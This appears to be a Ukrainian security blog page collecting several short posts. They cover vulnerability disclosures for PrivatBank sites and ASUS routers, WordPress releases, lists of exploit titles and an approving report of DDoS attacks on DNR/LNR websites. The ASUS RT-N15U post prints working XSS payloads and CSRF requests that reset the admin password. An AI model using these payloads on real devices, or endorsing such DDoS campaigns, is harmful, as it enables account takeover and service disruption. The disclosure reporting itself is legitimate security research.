Websecurity - Веб безпека

У травні, 15.05.2013, я знайшов Brute Force та Insufficient Anti-automation уразливості на сайті uniordreams.privatbank.ua. В той же день вислав ці уразливості банку.

Brute Force:

http://uniordreams.privatbank.ua/admin/

Відсутність захисту від підбору пароля адміна.

Insufficient Anti-automation:

На сторінці http://uniordreams.privatbank.ua не було захисту від автоматизованих атак. Що дозволяло спамити смсками.

Дані уразливості не були виправлені в 2013 році. ПриватБанк тоді проігнорував ці дірки, а вже в 2016 році всі вони були виправлені шляхом закриття сайту - любить банк так “виправляти” уразливості аби не платити винагороду. Відтоді на ньому працює лише редирект на інший сайт банку. Таким чином банк кинув мене, як це було з дірками на limit.privatbank.ua та інших сайтах ПБ.

У травні, 27.05.2016, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-N10. А також в його модифікаціях RT-N10E, RT-N10LX і RT-N10U. Це третя частина дірок в RT-N10.

Раніше я писав про уразливості ASUS RT-N15U та ASUS RT-N10.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

У листопаді, 16.11.2017, вийшла нова версія WordPress 4.9.

WordPress 4.9 це перший випуск нової 4.9 серії. В ній додано чимало покращень порівняно з попередніми версіями движка, а також виправлені баги.

Серед головних покращень зокрема можна відзначити покращений кастумайзер, перевірка розмітки на помилки, пісочниця для безпечної перевірки плагінів і тем, новий віджет для створення галерей, новий віджет для додання медіа та інші нововведення.

Окрім покращень для користувачів також було зроблено багато покращень для розробників.

У грудні вже відбувалися DDoS атаки на сайти ДНР і ЛНР. Розповім про DDoS атаки на сайти цих терористичних організацій, що мали місце у січні.

Це DDoS атаки на різні сайти ДНР і ЛНР, які ГПУ визнала терористичними організаціями, а також на сайти, які підтримують їх. Що були проведені Українськими Кібер Військами.

DDoS на без-вести.рф - 01-31.01.2018
DDoS на dnrpress.ru - 01-31.01.2018
DDoS на cikdnr.ru - 01-31.01.2018
DDoS на cik-lnr.info - 01-31.01.2018
DDoS на icp.su - 01-31.01.2018
DDoS на dokcpp.dn.ua - 01-31.01.2018
DDoS на antiukrop.su - 01-31.01.2018
DDoS на milion.kiev.ua - 01-31.01.2018
DDoS на banner.dn.ua - 01-31.01.2018
DDoS на patriot.donetsk.ua - 01-31.01.2018

Та інші сайти ДНР і ЛНР.

Таким чином українські хакери висловили протест проти цих незаконних організацій на їх сайтах. Деякі з них тимчасово не працювали, а деякі сайти припинили роботу.

В даній добірці експлоіти в веб додатках:

• Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management (деталі)
• Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation (деталі)
• InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution (деталі)
• NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure (деталі)
• PLANET ADSL Router AND-4101 - Remote File Disclosure (деталі)

Вітаю вас з Новим роком!

У зв’язку з Новим роком, Різдвом Христовим та іншими святами пропоную вам подивитися мої святкові листівки на флеші. На українській мові, російській мові та англійські мові.

Бажаю вам всього найкращого .

У жовтні, 31.10.2017, вийшла нова версія WordPress 4.8.3.

WordPress 4.8.3 це секюріті випуск нової 4.8 серії. В якому розробники виправили одну уразливість. Це SQL injection уразливість, що має місце не в ядрі, але в функції $wpdb->prepare(), тому атаку можна провести через плагіни і теми. Подібна потенційна SQLi вже була виправлена у версії WP 4.8.2.

Розробники переробили фільтрацію SQL запитів. Таким чином вони покращили безпеку движка та всіх додатків до нього.

Продовжуючи розпочату традицію, після попереднього відео про взлом ключів і POS систем готелів, пропоную нове відео на секюріті тематику. Цього разу відео про взлом різноманітних мережевих пристроїв. Рекомендую подивитися всім хто цікавиться цією темою.

DEFCON 25 - All Your Things Are Belong To Us

В жовтні на конференції DEFCON 25 відбувся виступ Zenofex, 0×00string, CJ 000 та Maximus64. В своєму виступі вони розповіли про атаки на різноманітні мережевих пристроїв - від IP камер до розумних телевізорів. В яких вони виявили численні уразливості, що вони представили в своїй доповіді як 0-day. Тому всі бажаючі могли одразу протестувати ці уразливості в зазначених пристроях.

Вони розповіли про проблеми з безпекою в багатьох мережевих пристроях, тим самим давши зрозуміти, що всі мережеві пристрої можуть бути взломані. Це веб камери, DVR, мережеві принтери, відеофони, мережеві системи зберігання даних (NAS), флешки для медіа стрімінгу, портативні Wi-Fi колонки, Wi-Fi роутери, програвачі Blue-ray дисків з сервісом медіа стрімінгу, системи розумного будинку, Smart TV. Рекомендую подивитися дане відео для розуміння поточного стану безпеки мережевих пристроїв.

30.01.2016

У листопаді, 30.11.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-N15U. Це друга частина дірок в RT-N15U.

Раніше я писав про уразливості ASUS RT-N15U.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

31.12.2017

Cross-Site Scripting (WASC-08):

http://site/apply.cgi?current_page=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
http://site/apply.cgi?next_host=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/apply.cgi?action_mode=+Save+&next_page=SaveRestart.asp&sid_list=General%3B&http_passwd=admin&v_password=admin&action=Save
http://site/apply.cgi?action_mode=Save%26Restart+&next_page=Restarting.asp&sid_list=General%3B&action=Save%26Restart

Уразливі всі версії ASUS RT-N15U. Перевірялося в прошивці v.1.9.2.7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах CP Polls, DW Question Answer, WP Mailto Links, Abtest і в темі Project. Для котрих з’явилися експлоіти.

• WordPress CP Polls 1.0.8 File Upload / Cross Site Scripting (деталі)
• WordPress Project Theme 2.0.95 Cross Site Request Forgery / Cross Site Scripting (деталі)
• WordPress DW Question Answer 1.4.2.2 Cross Site Scripting (деталі)
• WordPress WP Mailto Links 2.0.1 Cross Site Scripting (деталі)
• WordPress Abtest Local File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.